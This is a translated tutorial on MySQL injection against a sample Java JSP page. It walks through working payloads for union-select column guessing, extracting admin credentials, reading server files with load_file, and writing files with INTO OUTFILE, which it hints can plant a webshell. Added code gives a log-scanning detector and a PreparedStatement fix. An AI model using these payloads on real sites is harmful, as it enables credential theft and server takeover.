MYSQL Injection Essence

Source: Internet
Author: User
Tags: mysql, injection

Preface
I suddenly felt like writing an article today. I have never written one before, so if anything is wrong please point it out. This article requires basic knowledge of SQL statements to be understood well; readers who want to go deeper are encouraged to learn more about SQL statements and programming languages.
I do not hope for your praise; although I do my best, I just want this article to remove the obstacles in your learning process, and I hope it gives you an early understanding of MySQL injection.

1. How MySQL injection arises
The vulnerability occurs because the program does not filter sensitive characters during execution, so an attacker can pass in a malicious string that is merged into the structured query statement and executed as part of it.
Let's create a program that has no filtering. Because I don't have PHP on my machine I'm using Java, and I'll comment in detail.
Code
Database:

CREATE DATABASE IF NOT EXISTS `test`;
USE `test`;

/* table structure of the data table `account` */
DROP TABLE IF EXISTS `account`;
CREATE TABLE `account` (
  `accountId` BIGINT NOT NULL AUTO_INCREMENT,
  `accountname` VARCHAR(255) DEFAULT NULL,   -- the column lengths were lost in extraction; 255 is assumed here
  `accountpass` VARCHAR(255) DEFAULT NULL,
  PRIMARY KEY (`accountId`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

/* data table `account` data */
INSERT INTO `account` VALUES (1, 'account1', 'account1');

/* table structure of the data table `admin` */
DROP TABLE IF EXISTS `admin`;
CREATE TABLE `admin` (
  `adminid` BIGINT NOT NULL AUTO_INCREMENT,
  `adminname` VARCHAR(255) DEFAULT NULL,
  `adminpass` VARCHAR(255) DEFAULT NULL,
  PRIMARY KEY (`adminid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

/* data table `admin` data */
INSERT INTO `admin` VALUES (1, 'admin', 'admin');

Program:

<%@ page language="java" import="java.util.*,java.sql.*" pageEncoding="UTF-8"%>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

2. Exploiting the vulnerability
Everyone, notice this line:
ResultSet resultset = statement.executeQuery("SELECT * from account where accountId = '" + request.getParameter("id") + "'");
Here request.getParameter("id") reads the GET parameter id, which is the 1 in mysqlinject.jsp?id=1, so the SQL statement becomes SELECT * from account where accountId = '1'. What if we change it?

2.1 Detecting the vulnerability
If we write the id as mysqlinject.jsp?id=1' the SQL statement becomes SELECT * from account where accountId = '1'', and the statement errors, because a string value in SQL has to be wrapped in a pair of quote symbols such as ' and '; if the value were just a number, nothing would need to be written around it. If there is no error, the program replaces or filters the input, or protects it in some other way.
Then we can continue testing: mysqlinject.jsp?id=1' and ''=' makes the statement SELECT * from account where accountId = '1' and ''='', which should return normally.

Some people ask: why is my return not normal? There are 2 reasons. The first is that the program filters out the malicious characters; the second is that the program's statement differs from the one I wrote, for example select * from account where accountId = 1 without quotes, so the statement becomes select * from account where accountId = 1' and ''=' and errors. This problem is discussed below.

2.2 Using a union query to guess the number of columns in this query
Some people would ask: what use is guessing the number of columns? If you are only testing, none; but if you want to go further it is very useful, as the article will show, so be patient.

Anyone who understands SQL should know the union query: a union query merges the rows returned by a second query statement into the result of the first.

What are the conditions for merging with this query's result? The number of columns of the union query must equal the number of columns of this query. If they are not equal, the merge fails and you get an error. From this property you should already see how to work out the number of columns.

So what we are going to do is make the union query's column count equal to the column count of this query; in other words, no error means they are equal.
Start by guessing from the first column: construct the statement union select 1 in the address bar, after the program's statement.
Then the statement is mysqlinject.jsp?id=1' union select 1 and ''='.
Some people ask why the part at the end, and ''=', has to be added. Remember that our SQL statement requires the value to be enclosed in a pair of quotes: in select * from account where accountId = '1' we entered at the position of 1, so the quote that follows has to be dealt with, otherwise the statement errors.
In this procedure it is also this trailing ' that has to be eliminated. There are many ways to do it; to make it easy to understand, I am using and ''=' for now.
First of all, there are several ways to eliminate this ':
1. Using and ''=' is not convenient, but it does not cause errors in complex SQL statements.
2. Use a comment, # or /**/, so that everything behind it is commented out; but there is a big problem: with complex SQL statements this can cause errors.
Some people test it and ask: eh? Why did I add a # and nothing happened? Because this is a GET parameter passed in the address bar. Right: # is the fragment marker in the address bar, which means # and all the characters after it are not passed to the server. So # injection does not work in GET mode.

So why do some tools write the injection as mysqlinject.jsp?id=1'/**/and/**/union/**/select/**/1/**/and/**/'/**/=/**/'/* when constructing it? Because some programs have functions that strip spaces from the passed-in parameters; if the spaces are removed, the statement the program produces is wrong and will always error. So some tools use /**/ in place of the space.

And what is /**/? /**/ is a kind of comment, the block comment: from /* until */, any code in between becomes a comment. It is the comment style programmers use when writing long comments.

What is the last /* for? That is used to deal with the unpaired quote left at the end of the SQL statement.

Let's start testing.
mysqlinject.jsp?id=1'/**/union/**/select/**/1/*
SELECT * from account where accountId = '1'/**/union/**/select/**/1/*'
Have you noticed the last line of the output?
Javax.servlet.ServletException:The used SELECT statements has a different number of columns
It means "the SELECT statements used have a different number of columns", so the two queries cannot be merged and the query fails.

Keep going: change select 1 to select 1,2, then select 1,2,3, and so on. The number of values in the select at the point where the error disappears is the number of columns of this query.
Below we see 1|2|3| returned; this row is the one merged in from our union query. Try replacing union select 1,2,3 with union select 4,5,6: does the output below become 4|5|6|?

Some people say: you're a liar, however I change it, I changed it to 7,8,9 and it didn't come out, it is still the real data, you're cheating. I am not cheating; I would not cheat.
Some programs only output the first row of the returned data. The union query's rows are merged in after the rows of this query, so the program only outputs this query's row; the union query's data is there too, but it is not output. So what now? The clever reader has already guessed: as long as this query outputs nothing, the union row comes first. Haha, but how do we make this query output nothing? Here is a simple way. Look at the SQL statement: we already have the limiting condition where accountId = ?, so limit accountId to an id that does not exist. Action speaks louder than thought, so try it.
mysqlinject.jsp?id=1000'/**/union/**/select/**/4,5,6/*
SELECT * from account where accountId = '1000'/**/union/**/select/**/4,5,6/*'
Haha, sure enough!!! Pay attention to the id value 1000: we specified an id that does not exist, so the original row naturally disappears.


2.3 A less reliable alternative for guessing the number of columns in this query
This method is less likely to work, but it can greatly reduce the workload. It is only usable for simple SELECT * statements.
This method uses ORDER BY sorting in MySQL. Sorting arranges the rows in order. Let's write an SQL statement: select * from account where accountId = '1' order by accountId sorts the result in ascending order of accountId. But we don't know the column names, so how do we guess? Here is the key: MySQL supports sorting by column number, and select * from account where accountId = '1' order by 1 sorts by the first column.
Gee, you're lying to us again; how does sorting let you guess the number of columns? What if I sort by a column that does not exist, such as the fourth? An analogy: you have 3 pockets with at most 10 yuan each, you eat one meal a day of 3 catties of rice at 10 yuan per catty, but today you eat 4 catties and need 40 yuan; with only 3 pockets you can never have 40 yuan, so you get beaten.
That is: with 3 columns in total, order by 3 sorts by the 3rd column and is normal; order by 4 sorts by a 4th column that does not exist and errors. So there is no 4th column, and this query has 3 columns.
This method is based on experience. When I use it, it usually succeeds, and when it does not, not much is lost.

2.4 Using union to guess other tables and query them
You can use this method to query the contents of other tables, for example the administrator's password. But there is a prerequisite: the table name and the column names. How do you know them? Guess!!! Because MySQL and SQL Server have different system functions: SQL Server has sp_helpdb and MySQL does not, so you can only guess.
OK, start constructing the statement. Let's guess whether there is an admin table.
mysqlinject.jsp?id=1'/**/union/**/select/**/4,5,6/**/from/**/admin/*
Sql: select * from account where accountId = '1'/**/union/**/select/**/4,5,6/**/from/**/admin/*'

If the admin table exists, the return is normal; if not, there will be an error.

See that? There is an admin table. To help everyone understand better, let's guess another table that does not exist.

mysqlinject.jsp?id=1'/**/union/**/select/**/4,5,6/**/from/**/helloword/*
Sql: select * from account where accountId = '1'/**/union/**/select/**/4,5,6/**/from/**/helloword/*'

See that? There is no helloword table, so it errors.
Again, why still write 4,5,6? Because we don't know the column names; if you write *, all of its columns are listed, and if that number differs from this query's column count, there will be an error. So write an equal number of values.
Now that the table name is known, how do we list the columns? People are clever: replace one of 4,5,6 with the column name you are guessing. So it is constructed like this:
mysqlinject.jsp?id=1'/**/union/**/select/**/adminid,5,6/**/from/**/admin/*
Sql: select * from account where accountId = '1'/**/union/**/select/**/adminid,5,6/**/from/**/admin/*'

See that? In 1|5|6 the 1 is adminid. If the output is normal, the column exists. Guess the column names one by one and bring them into the union query, and the administrator account or password is found. Now I'll bring in all the column names.

mysqlinject.jsp?id=1'/**/union/**/select/**/adminid,adminname,adminpass/**/from/**/admin/*
Sql: select * from account where accountId = '1'/**/union/**/select/**/adminid,adminname,adminpass/**/from/**/admin/*'

Haha, here it is: 1|admin|admin| is adminid|adminname|adminpass|
You can also add conditions to the union query; for example, if you know the user admin exists, construct union select adminid,adminname,adminpass from admin where adminname = 'admin'. Play with it yourself.
2.5 Using MySQL system functions
2.5.1 Using the load_file() function to display a file
load_file, as the name implies, loads a file. It does not run it; it displays its contents, but you must have read permission on the file. Let's start by constructing a statement that displays the C:\boot.ini file.
mysqlinject.jsp?id=1'/**/union/**/select/**/1,load_file(0x633a5c626f6f742e696e69),3/*
Sql: select * from account where accountId = '1'/**/union/**/select/**/1,load_file(0x633a5c626f6f742e696e69),3/*'

Did you see it? The contents of the C:\boot.ini file. Another question: why is the value inside load_file() garbled? It is not garbled; it is C:\boot.ini in hexadecimal encoding. The path cannot be written here directly as a quoted string, so it is given in hexadecimal or ASCII encoding; convert the path to hex or ASCII and it executes.
Again, why is load_file in the second column position rather than the first or the third? Because the first column won't work and the others will: the first column is an int type, a number type; would you put your girlfriend in the men's room? Just joking. On Linux you can use / to list directories, but you must have permission on the directory being listed.
Listing directories and reading files through load_file may produce garbled output because of the file's encoding. This problem can be solved with the substring function: SUBSTRING(string, start, length).
Suppose we want to return the third character; then mysqlinject.jsp?id=1'/**/union/**/select/**/1,substring(load_file(0x633a5c626f6f742e696e69),3,1),3/* returns the third character, which is a very good way around garbled characters.
I will be making a tool like this recently and will be posted on my personal homepage.
2.5.2 Writing a webshell using outfile
MySQL has a feature for writing the results of a query out to a file: INTO OUTFILE. First, construct a simple statement.
SELECT 'Hello word' INTO OUTFILE 'c:\\a.txt' writes 'Hello word' to c:\a.txt.
Then construct it on the site as well.
mysqlinject.jsp?id=1'/**/union/**/select/**/1,'hello',3/**/into/**/outfile/**/'c:\\hello.txt'/*
Sql: select * from account where accountId = '1'/**/union/**/select/**/1,'hello',3/**/into/**/outfile/**/'c:\\hello.txt'/*'
The write succeeded. But why did the page show an error? Because the data was written into the file and not returned as a result set. If you replace hello with something else and write it into a website directory, it's scary...
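As an added example from the defender's side, not code from the article, here is a small Java (10 or later) scanner that undoes the URL encoding and the /**/-in-place-of-space trick the article's requests rely on, then flags the union select, order by N, and ''=', load_file( and into outfile patterns from sections 2.1 through 2.5 in access-log lines; the class name, the signature names and the log lines are constructed for this example.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class InjectionLogScan {
    // Request target inside a combined-format access-log line: "GET /x.jsp?id=1 HTTP/1.1"
    private static final Pattern REQUEST = Pattern.compile("\"(?:GET|POST) (\\S+) HTTP/");
    // Signatures, applied after decoding and after /**/ and runs of whitespace become one space
    private static final String[][] SIGNATURES = {
        {"union-select",   "\\bunion\\s+(?:all\\s+)?select\\b"},
        {"order-by-probe", "\\border\\s+by\\s+\\d+"},
        {"quote-and-eq",   "'\\s*and\\s*''\\s*='"},
        {"load_file",      "\\bload_file\\s*\\("},
        {"into-outfile",   "\\binto\\s+(?:out|dump)file\\b"},
    };

    // Undo the evasions the article relies on: URL encoding and /**/ used in place of spaces.
    static String normalize(String target) {
        String decoded = target;
        try { decoded = URLDecoder.decode(target, StandardCharsets.UTF_8); }
        catch (IllegalArgumentException e) { /* malformed %-sequence: scan the raw text */ }
        return decoded.toLowerCase().replaceAll("/\\*.*?\\*/", " ").replaceAll("\\s+", " ");
    }

    // Names of the signatures that fire for one log line; an empty list means nothing matched.
    static List<String> scanLine(String logLine) {
        List<String> hits = new ArrayList<>();
        Matcher m = REQUEST.matcher(logLine);
        if (!m.find()) return hits;
        String normalized = normalize(m.group(1));
        for (String[] sig : SIGNATURES) {
            if (Pattern.compile(sig[1]).matcher(normalized).find()) hits.add(sig[0]);
        }
        return hits;
    }

    public static void main(String[] args) {
        // Constructed lines mirroring the article's requests (%27 is the URL-encoded quote).
        String prefix = "10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] \"GET /mysqlinject.jsp?id=";
        String[] sample = {
            prefix + "1 HTTP/1.1\" 200 512",
            prefix + "1%27%20and%20%27%27=%27 HTTP/1.1\" 200 512",
            prefix + "1%27/**/union/**/select/**/1,load_file(0x633a5c626f6f742e696e69),3/* HTTP/1.1\" 200 2048",
            prefix + "1%27%20order%20by%204/* HTTP/1.1\" 500 120",
        };
        for (String line : sample) System.out.println(scanLine(line) + "  <- " + line);
    }
}
```

The first sample line produces an empty list; the others report quote-and-eq, union-select plus load_file, and order-by-probe respectively, so a 500 response paired with any hit is the combination worth alerting on.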

3. Protection and summary
Protect by filtering special keywords; there is plenty of such code on the web, so I won't write it here.
For Java there is another protective measure, which is to use the PreparedStatement object for the query; I won't say much about it here.
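As an added example, not the article's own code, here is the query from section 2 in its concatenated form beside the PreparedStatement version mentioned above; the class name AccountLookup, the method names and the choice of accountname as the value looked up are assumptions.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;

public class AccountLookup {
    // The article's pattern: the request parameter is pasted into the SQL text, so the caller
    // can supply the quote that closes '1' and everything after it is parsed as SQL.
    static String buildVulnerableSql(String id) {
        return "SELECT * FROM account WHERE accountId = '" + id + "'";
    }

    static String lookupVulnerable(Connection conn, String id) throws SQLException {
        try (Statement st = conn.createStatement();
             ResultSet rs = st.executeQuery(buildVulnerableSql(id))) {
            return rs.next() ? rs.getString("accountname") : null;
        }
    }

    // Hardened: the SQL text is constant and holds one placeholder; the value is bound with
    // setLong and travels separately from the statement, so it cannot change its structure.
    // accountId is BIGINT in the article's schema, so a non-numeric id is rejected up front.
    static String lookupSafe(Connection conn, String id) throws SQLException {
        long accountId;
        try {
            accountId = Long.parseLong(id.trim());
        } catch (NumberFormatException e) {
            throw new IllegalArgumentException("id must be an integer", e);
        }
        try (PreparedStatement ps = conn.prepareStatement(
                 "SELECT accountname FROM account WHERE accountId = ?")) {
            ps.setLong(1, accountId);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next() ? rs.getString("accountname") : null;
            }
        }
    }

    public static void main(String[] args) {
        // No database needed to see the difference: print what the concatenation turns each id into.
        String[] ids = {"1", "1'", "1' and ''='", "1000'/**/union/**/select/**/4,5,6/*"};
        for (String id : ids) System.out.println(buildVulnerableSql(id));
        // lookupSafe sends the same fixed text for every one of them and binds the value,
        // or rejects the id before any SQL is built.
    }
}
```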
